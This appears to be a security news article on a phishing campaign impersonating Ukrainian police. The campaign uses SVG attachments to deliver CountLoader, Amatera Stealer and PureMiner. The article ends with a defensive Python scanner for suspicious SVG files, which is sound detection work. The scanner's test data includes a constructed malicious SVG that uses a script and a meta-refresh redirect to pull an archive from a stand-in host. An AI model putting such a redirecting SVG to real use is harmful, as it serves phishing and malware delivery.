New Phishing Campaign Impersonates Ukrainian Police to Deliver Amatera Stealer and PureMiner
Researchers at Fortinet FortiGuard Labs have uncovered a new cyber-attack campaign masquerading as communications from the National Police of Ukraine and employing an unusual malware delivery chain. The attackers dispatch emails with SVG attachments that trigger a multi-stage download sequence: first CountLoader, then the Amatera stealer, and finally a stealthy cryptocurrency miner named PureMiner.
The intrusion sequence is layered and deliberate. Recipients receive a message ostensibly from Ukrainian law enforcement; the attachment is an SVG file embedding HTML that redirects the victim to a password-protected ZIP archive. Inside that archive sits a Windows CHM help file which, once opened, activates CountLoader. Previously observed by Silent Push, CountLoader has been used to deploy Cobalt Strike, AdaptixC2 and PureHVNC RATs; in this campaign it serves to deliver Amatera Stealer and PureMiner.
Amatera Stealer is a derivative of ACRStealer: it harvests system fingerprints, exfiltrates files with targeted extensions, extracts credentials and data from Chromium- and Gecko-based browsers, and steals account information from Steam, Telegram, FileZilla and various cryptocurrency wallets.
PureMiner, implemented in .NET, operates as a fileless process to mine cryptocurrency covertly. The malware employs obfuscation techniques such as ahead-of-time compilation with process-name spoofing or in-memory loading using PythonMemoryModule to evade detection.
Of particular note is the provenance of the tooling: PureMiner and PureHVNC belong to a family attributed to an actor using the handle “PureCoder.” That suite also includes PureCrypter (which conceals .NET and native binaries), PureRAT (aka ResolverRAT, a successor to PureHVNC), PureLogs for data theft and logging, BlueLoader for converting infected hosts into a botnet, and PureClipper, which substitutes clipboard cryptocurrency addresses to hijack transfers.
Fortinet stresses that abusing SVG files as a façade for HTML makes these campaigns especially insidious: recipients are unlikely to suspect a graphic file and so open the attachment without caution. In this instance, that very technique permitted the silent deployment of CountLoader and the subsequent installation of PureCoder’s stealth toolset.
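The SVG-as-HTML-carrier technique described above (an SVG attachment whose embedded HTML redirects the recipient to the next stage) is something a mail gateway or triage analyst can screen for before the file ever reaches a browser. The following Python helper is an added example written for this article; it is not Fortinet's code and it is not derived from the campaign's actual attachment. It parses an SVG and reports markers that have no place in a plain graphic: `<script>`, `<foreignObject>` (the element that lets an SVG embed HTML), `<iframe>`/`<object>`/`<embed>`, `<meta http-equiv="refresh">` redirects, `on*` event handlers, and `javascript:`/`data:` URLs. The function name `scan_svg`, the labels it emits, and both sample SVGs (including the `example.invalid` URL) are constructed for illustration.

```python
"""Triage helper: flag SVG attachments that carry active or redirecting content.

Added example for this article; constructed samples, not the campaign's real file.
"""
import re
import xml.etree.ElementTree as ET

# Attribute names that can carry a URL and so deserve a scheme check.
URL_ATTRS = {"href", "src", "data", "action"}
EVENT_ATTR = re.compile(r"^on[a-z]+$", re.I)          # onload, onclick, ...
URL_SCHEME = re.compile(r"^\s*(javascript|data|https?):", re.I)
# Finding prefixes that on their own justify quarantining the attachment.
HARD_SIGNALS = ("script", "embedded-", "meta-refresh", "event-handler",
                "url:javascript", "url:data")


def _local(name: str) -> str:
    """Strip an XML namespace ('{ns}tag' -> 'tag') and lower-case the result."""
    return name.split("}")[-1].lower()


def _verdict(findings: list) -> dict:
    unique = list(dict.fromkeys(findings))              # de-duplicate, keep order
    suspicious = any(f.startswith(HARD_SIGNALS) for f in unique)
    return {"suspicious": suspicious, "findings": unique}


def scan_svg(svg_text: str) -> dict:
    """Return {'suspicious': bool, 'findings': [labels]} for one SVG document."""
    findings = []
    try:
        root = ET.fromstring(svg_text)
    except ET.ParseError:
        # Browsers tolerate sloppy markup that a strict XML parser rejects, so
        # fall back to a raw text scan rather than silently passing the file.
        findings.append("malformed-xml")
        lowered = svg_text.lower()
        if "<script" in lowered:
            findings.append("script")
        if "<foreignobject" in lowered:
            findings.append("embedded-html:foreignObject")
        return _verdict(findings)

    for el in root.iter():
        if not isinstance(el.tag, str):                  # skip comments / PIs
            continue
        tag = _local(el.tag)
        if tag == "script":
            findings.append("script")
        elif tag == "foreignobject":                    # HTML embedded in SVG
            findings.append("embedded-html:foreignObject")
        elif tag in ("iframe", "object", "embed"):
            findings.append(f"embedded-object:{tag}")
        elif tag == "meta" and el.get("http-equiv", "").lower() == "refresh":
            findings.append("meta-refresh")             # client-side redirect
        for attr, value in el.attrib.items():
            name = _local(attr)                          # handles xlink:href
            if EVENT_ATTR.match(name):
                findings.append(f"event-handler:{name}")
            elif name in URL_ATTRS:
                m = URL_SCHEME.match(value)
                if m:
                    findings.append(f"url:{m.group(1).lower()}:{tag}")
    return _verdict(findings)


# Constructed samples (not real attachments): a harmless icon and an SVG that
# wraps an HTML redirect the way the article describes.
BENIGN_SVG = (
    '<svg xmlns="http://www.w3.org/2000/svg" width="100" height="100">'
    '<circle cx="50" cy="50" r="40" fill="blue"/></svg>'
)
SUSPICIOUS_SVG = """<svg xmlns="http://www.w3.org/2000/svg" width="1" height="1">
  <foreignObject width="1" height="1">
    <html xmlns="http://www.w3.org/1999/xhtml">
      <meta http-equiv="refresh" content="0;url=https://example.invalid/archive.zip"/>
    </html>
  </foreignObject>
  <script>window.location = "https://example.invalid/archive.zip";</script>
</svg>"""

if __name__ == "__main__":
    for label, sample in (("benign", BENIGN_SVG), ("suspicious", SUSPICIOUS_SVG)):
        print(label, scan_svg(sample))
```

Run as a script it prints a verdict for each constructed sample; in a gateway it would be called once per SVG attachment, with any `suspicious` result routed to quarantine. The raw-text fallback on parse failure matters in practice: a file the XML parser rejects is exactly the kind a rendering engine may still execute, so "malformed" must not become "clean".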